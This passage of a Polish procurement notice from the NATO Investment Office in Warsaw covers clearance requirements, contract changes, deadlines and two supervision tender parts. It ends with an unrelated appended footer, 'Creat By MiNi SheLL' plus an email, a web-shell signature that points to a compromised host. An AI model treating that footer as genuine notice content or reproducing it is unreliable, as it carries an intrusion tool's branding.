- oświadczenie o zobowiązaniu się do przestrzegania przez Wykonawcę przepisów i procedur dotyczących ochrony informacji niejawnych określonych w ustawie z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. Nr 182, poz.1228), zarówno w procesie przygotowywania oferty, jak i w toku  realizacji przedmiotu zamówienia (wzór oświadczenia - Załącznik nr 5 do SIWZ);
- kopię ŚBP potwierdzającego zdolność do ochrony informacji niejawnych 
o klauzuli POUFNE lub wyższej co najmniej trzeciego stopnia;
- kopię poświadczenia bezpieczeństwa kierownika jednostki organizacyjnej wydanego przez ABW lub SKW;
- kopię zaświadczenia kierownika jednostki organizacyjnej o odbyciu szkolenia 
w zakresie ochrony informacji niejawnych wydanego przez pełnomocnika ochrony w przypadku jego zatrudnienia lub wydanego przez ABW lub SKW;
- kopie poświadczeń bezpieczeństwa osobowego personelu Wykonawcy wyznaczonego do realizacji przedmiotu zamówienia;
b) w przypadku Wykonawcy wykonującego działalność jednoosobowo
i osobiście:
- oświadczenie o zobowiązaniu się do przestrzegania przez Wykonawcę przepisów i procedur dotyczących ochrony informacji niejawnych określonych w ustawie z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. Nr 182, poz.1228) zarówno w procesie przygotowywania oferty, jak i w toku realizacji przedmiotu zamówienia (wzór oświadczenia - Załącznik nr 5 do SIWZ);
- kopię poświadczenia bezpieczeństwa Wykonawcy o klauzuli POUFNE lub wyższej wydanego przez ABW lub SKW;
- kopię zaświadczenia Wykonawcy o odbyciu szkolenia w zakresie ochrony informacji niejawnych wydanego przez ABW lub SKW</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zastrzega sobie możliwość zmiany istotnych postanowień zawartej umowy w sytuacji obiektywnej konieczności wprowadzenia zmiany, w niżej przedstawionym zakresie, z zastrzeżeniem art. 140 ust. 1 i 3 ustawy, w przypadku: 
a) zmiany w obowiązujących przepisach prawa, mającej wpływ na przedmiot i warunki realizacji umowy oraz zmiany sytuacji prawnej lub faktycznej Wykonawcy lub Zamawiającego, skutkująca niemożnością realizacji przedmiotu umowy; 
b) działania lub zaniechania osób trzecich lub organów administracji, w stosunku do okoliczności towarzyszących zawarciu umowy i czyniących niemożliwym spełnienie świadczeń stron umowy, w sposób określony pierwotnie w umowie;
c) wystąpienia siły wyższej, czyli zdarzenia, którego strony nie mogły przewidzieć 
i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia wykonanie w części lub całości zobowiązań; 
d) nadzwyczajnych okoliczności, nie będących siłą wyższą, grożących rażącą stratą, których strony nie przewidziały przy zawarciu umowy;
e) klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów; 
f) wystąpienia wykopalisk i odkryć archeologicznych oraz o znaczeniu historycznym, bądź wystąpienia niewybuchów, niewypałów uniemożliwiających prowadzenie robót;
g) aktualizacji lub zmiany rozwiązań technicznych lub technologii wykonywania elementów robót oraz aktualizacji lub zmiany dokumentacji projektowej i technicznej;
h) zmiany osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne osoby spełniające warunki określone w SIWZ oraz zmiany przedstawicieli Zamawiającego;
i) zmiany terminu odbioru końcowego JFAI na skutek decyzji Komitetu Inwestycyjnego NATO;
j) opóźnienia w uzyskaniu pozwolenia na użytkowanie obiektu; 
k) opóźnienia w przeprowadzeniu kontroli przez podmioty zewnętrzne;
l) zmiany stawki podatku VAT wynikającej z obowiązującego prawa;
m) konieczności rezygnacji z części prac lub usług; 
n) zmiany terminu realizacji Umowy z WRB-M; 
o) zaistnienia okoliczności, w następstwie których została zawarta umowa na wykonanie usług dodatkowych;
2. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w zakresie:
a) terminu wykonania przedmiotu umowy, z zastrzeżeniem, iż przedłużenie terminu wykonania przedmiotu umowy może nastąpić wyłącznie w przypadkach, o których mowa w ust. 1 lit. i, j, k, n, o;
b) obniżenia wynagrodzenia Wykonawcy;
c) zakresu rzeczowego przedmiotu umowy, która nie spowoduje podwyższenia wynagrodzenia Wykonawcy;
d) przedstawicieli Zamawiającego oraz osób, przy pomocy których Wykonawca realizuje przedmiot umowy.
3. Zmiana postanowień zawartej umowy może nastąpić z inicjatywy Zamawiającego
lub na pisemny wniosek Wykonawcy, który powinien zawierać: opis proponowanej zmiany i jej uzasadnienie, wpływ zmiany na wysokość wynagrodzenia Wykonawcy, czas realizacji zmiany oraz jej wpływ na termin wykonania przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ziotp.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Inwestycji Organizacji Traktatu Północnoatlantyckiego ul. Nowowiejska 28A, 02-010 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2013 godzina 11:00, miejsce: Zakład Inwestycji Organizacji Traktatu Północnoatlantyckiego ul. Nowowiejska 28A, 02-010 Warszawa, Kancelaria Jawna - pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w branży elektrycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany zakres prac obejmuje:
1) sprawowanie nadzoru inwestorskiego z uwzględnieniem specyfiki każdej z części zamówienia, o której mowa w pkt. 1 powyżej, (wraz z kontrolą rozliczeń) w zakresie określonym przepisami prawa budowlanego;
2) reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z podstawowymi dokumentami, w tym w szczególności
z decyzją o pozwoleniu na budowę wraz z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót, zakresem robót, kosztorysem ofertowym oraz zgodnie z aktualnymi przepisami i zasadami wiedzy technicznej;
3) sprawdzanie jakości wykonywanych robót i zgodności dowodów jakości wbudowywanych wyrobów budowlanych, określonych w projekcie budowlanym
i specyfikacji technicznej wykonania i odbioru robót, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie oraz wyprodukowanych poza krajami członkowskimi NATO;
4) sprawdzanie i odbiór robót budowlanych zanikających lub ulegających zakryciu przed ich zakryciem, uczestniczenie w próbach, badaniach, sprawdzeniach i odbiorach technicznych oraz sprawdzanie inwentaryzacji geodezyjnej powykonawczej z potwierdzaniem ww. czynności stosowną adnotacją w dzienniku budowy;
5) sprawdzanie kompletności przedstawionych przez Wykonawcę dokumentów 
i zaświadczeń, niezbędnych do przeprowadzenia odbioru robót;
6) opiniowanie zasadności zgłoszonych przez WRB-M rozwiązań zamiennych, robót dodatkowych lub robót zaniechanych, przy współpracy z Zamawiającym oraz opiniowanie wymaganych dokumentów, w szczególności protokołów konieczności,
a także przedstawianie propozycji ewentualnych zmian projektowych wraz
z uzasadnieniem;
7) wydawanie kierownikowi budowy poleceń, potwierdzonych wpisami 
do dziennika budowy, z wyznaczonymi terminami ich wykonania, dotyczących
w szczególności: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań (w tym wymagających odkrycia robót lub elementów zakrytych)
i zawiadamianie o nich na piśmie Zamawiającego, a także przedstawianie opinii dotyczących prowadzonych robót budowlanych oraz zabudowanych wyrobów budowlanych lub urządzeń technicznych, w razie zastrzeżeń co do ich jakości lub braku dowodów dopuszczenia do stosowania w budownictwie;
8) żądanie od kierownika budowy dokonania poprawek, bądź ponownego wykonania uprzednio wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie 
albo spowodować niedopuszczalną niezgodność z dokumentacją projektową, w tym z projektem budowlanym lub decyzją;
9) stwierdzanie aktualnego stanu robót w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi potrzeba ustalenia ilości, jakości i wartości robót
w zakresie niezbędnym do rozliczeń z Zamawiającym;
10) bieżące potwierdzanie zapisów dokonywanych przez kierownika budowy w książce obmiarów;
11) prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z Umową zawartą z WRB-M oraz systematyczne gromadzenie i przygotowywanie we współdziałaniu z pozostałymi uczestnikami procesu inwestycyjnego materiałów analitycznych niezbędnych do rozliczenia wykonanych robót i oceny osiągniętych efektów rzeczowych lub gospodarczych;
12) kontrolowanie rozliczeń budowy, stosownie do zasad określonych w Umowie 
z WRB-M w zakresie procedur odbiorowych i płatności dla odbiorów częściowych
i końcowych, w szczególności sprawdzenie i weryfikacja kosztorysów powykonawczych dla robót naprawczych i niewykonanych przez poprzedniego wykonawcę robót budowlano-montażowych;
13) realizowanie innych obowiązków, wynikających ze sprawowanego nadzoru inwestorskiego, a także kontrolowanie na bieżąco zgodności realizacji robót oraz terminowości ich wykonania, zgodnie z HRF do Umowy z WRB-M;
14) funkcję Koordynatora inspektorów nadzoru sprawuje Inspektor nadzoru w branży sanitarnej (technologicznej);
15) Koordynatorowi inspektorów nadzoru podlegają Inspektorzy nadzoru w branżach: konstrukcyjno-budowlanej, drogowej, elektrycznej, telekomunikacyjnej (teletechnicznej) a także ochrony środowiska oraz kolejowej;
16) sporządzanie przez poszczególnych Inspektorów nadzoru i przedstawianie Koordynatorowi inspektorów nadzoru miesięcznych sprawozdań rzeczowo-finansowych z postępu realizacji robót w stosunku do HRF WRB-M w zakresie nadzorowanej branży (w sposób narastający), w terminie do 7-go dnia miesiąca, następującego po miesiącu, którego sprawozdanie dotyczy, według wzoru Zamawiającego, stanowiącego załącznik nr 3 do Umowy;
17) Koordynator będzie sporządzał i przedstawiał Zamawiającemu zbiorcze miesięczne sprawozdania rzeczowo-finansowe z postępu realizacji robót w stosunku do HRF WRB-M z realizacji całości robót we wszystkich branżach (w sposób narastający), w terminie do 10-go dnia miesiąca, następującego po miesiącu, którego sprawozdanie dotyczy, według wzoru Zamawiającego, stanowiącego załącznik nr 3 do Umowy;
18) udział we wspólnej inspekcji formalnego odbioru JFAI (ang. Joint Formal Acceptance Inspection);
19) nadzór i kontrola nad prawidłowym prowadzeniem dziennika budowy oraz księgi obmiaru robót;
20) informowanie Zamawiającego o wszystkich istotnych sprawach mających wpływ na realizację robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie nadzoru inwestorskiego nad robotami budowlanymi w branży telekomunikacyjnej (teletechnicznej).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewidywany zakres prac obejmuje:
1) sprawowanie nadzoru inwestorskiego z uwzględnieniem specyfiki każdej z części zamówienia, o której mowa w pkt. 1 powyżej, (wraz z kontrolą rozliczeń) w zakresie określonym przepisami prawa budowlanego;
2) reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z podstawowymi dokumentami, w tym w szczególności
z decyzją o pozwoleniu na budowę wraz z projektem budowlanym, specyfikacją techniczną wykonania i odbioru robót, zakresem robót, kosztorysem ofertowym oraz zgodnie z aktualnymi przepisami i zasadami wiedzy technicznej;
3) sprawdzanie jakości wykonywanych robót i zgodności dowodów jakości wbudowywanych wyrobów budowlanych, określonych w projekcie budowlanym
i specyfikacji technicznej wykonania i odbioru robót, a w szczególności zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie oraz wyprodukowanych poza krajami członkowskimi NATO;
4) sprawdzanie i odbiór robót budowlanych zanikających lub ulegających zakryciu przed ich zakryciem, uczestniczenie w próbach, badaniach, sprawdzeniach i odbiorach technicznych oraz sprawdzanie inwentaryzacji geodezyjnej powykonawczej z potwierdzaniem ww. czynności stosowną adnotacją w dzienniku budowy;
5) sprawdzanie kompletności przedstawionych przez Wykonawcę dokumentów 
i zaświadczeń, niezbędnych do przeprowadzenia odbioru robót;
6) opiniowanie zasadności zgłoszonych przez WRB-M rozwiązań zamiennych, robót dodatkowych lub robót zaniechanych, przy współpracy z Zamawiającym oraz opiniowanie wymaganych dokumentów, w szczególności protokołów konieczności,
a także przedstawianie propozycji ewentualnych zmian projektowych wraz
z uzasadnieniem;
7) wydawanie kierownikowi budowy poleceń, potwierdzonych wpisami 
do dziennika budowy, z wyznaczonymi terminami ich wykonania, dotyczących
w szczególności: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań (w tym wymagających odkrycia robót lub elementów zakrytych)
i zawiadamianie o nich na piśmie Zamawiającego, a także przedstawianie opinii dotyczących prowadzonych robót budowlanych oraz zabudowanych wyrobów budowlanych lub urządzeń technicznych, w razie zastrzeżeń co do ich jakości lub braku dowodów dopuszczenia do stosowania w budownictwie;
8) żądanie od kierownika budowy dokonania poprawek, bądź ponownego wykonania uprzednio wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie 
albo spowodować niedopuszczalną niezgodność z dokumentacją projektową, w tym z projektem budowlanym lub decyzją;
9) stwierdzanie aktualnego stanu robót w razie przerwy w robotach oraz w innych wypadkach, gdy zachodzi potrzeba ustalenia ilości, jakości i wartości robót
w zakresie niezbędnym do rozliczeń z Zamawiającym;
10) bieżące potwierdzanie zapisów dokonywanych przez kierownika budowy w książce obmiarów;
11) prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z Umową zawartą z WRB-M oraz systematyczne gromadzenie i przygotowywanie we współdziałaniu z pozostałymi uczestnikami procesu inwestycyjnego materiałów analitycznych niezbędnych do rozliczenia wykonanych robót i oceny osiągniętych efektów rzeczowych lub gospodarczych;
12) kontrolowanie rozliczeń budowy, stosownie do zasad określonych w Umowie 
z WRB-M w zakresie procedur odbiorowych i płatności dla odbiorów częściowych
i końcowych, w szczególności sprawdzenie i weryfikacja kosztorysów powykonawczych dla robót naprawczych i niewykonanych przez poprzedniego wykonawcę robót budowlano-montażowych;
13) realizowanie innych obowiązków, wynikających ze sprawowanego nadzoru inwestorskiego, a także kontrolowanie na bieżąco zgodności realizacji robót oraz terminowości ich wykonania, zgodnie z HRF do Umowy z WRB-M;
14) funkcję Koordynatora inspektorów nadzoru sprawuje Inspektor nadzoru w branży sanitarnej (technologicznej);
15) Koordynatorowi inspektorów nadzoru podlegają Inspektorzy nadzoru w branżach: konstrukcyjno-budowlanej, drogowej, elektrycznej, telekomunikacyjnej (teletechnicznej) a także ochrony środowiska oraz kolejowej;
16) sporządzanie przez poszczególnych Inspektorów nadzoru i przedstawianie Koordynatorowi inspektorów nadzoru miesięcznych sprawozdań rzeczowo-finansowych z postępu realizacji robót w stosunku do HRF WRB-M w zakresie nadzorowanej branży (w sposób narastający), w terminie do 7-go dnia miesiąca, następującego po miesiącu, którego sprawozdanie dotyczy, według wzoru Zamawiającego, stanowiącego załącznik nr 3 do Umowy;
17) Koordynator będzie sporządzał i przedstawiał Zamawiającemu zbiorcze miesięczne sprawozdania rzeczowo-finansowe z postępu realizacji robót w stosunku do HRF WRB-M z realizacji całości robót we wszystkich branżach (w sposób narastający), w terminie do 10-go dnia miesiąca, następującego po miesiącu, którego sprawozdanie dotyczy, według wzoru Zamawiającego, stanowiącego załącznik nr 3 do Umowy;
18) udział we wspólnej inspekcji formalnego odbioru JFAI (ang. Joint Formal Acceptance Inspection);
19) nadzór i kontrola nad prawidłowym prowadzeniem dziennika budowy oraz księgi obmiaru robót;
20) informowanie Zamawiającego o wszystkich istotnych sprawach mających wpływ na realizację robót..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com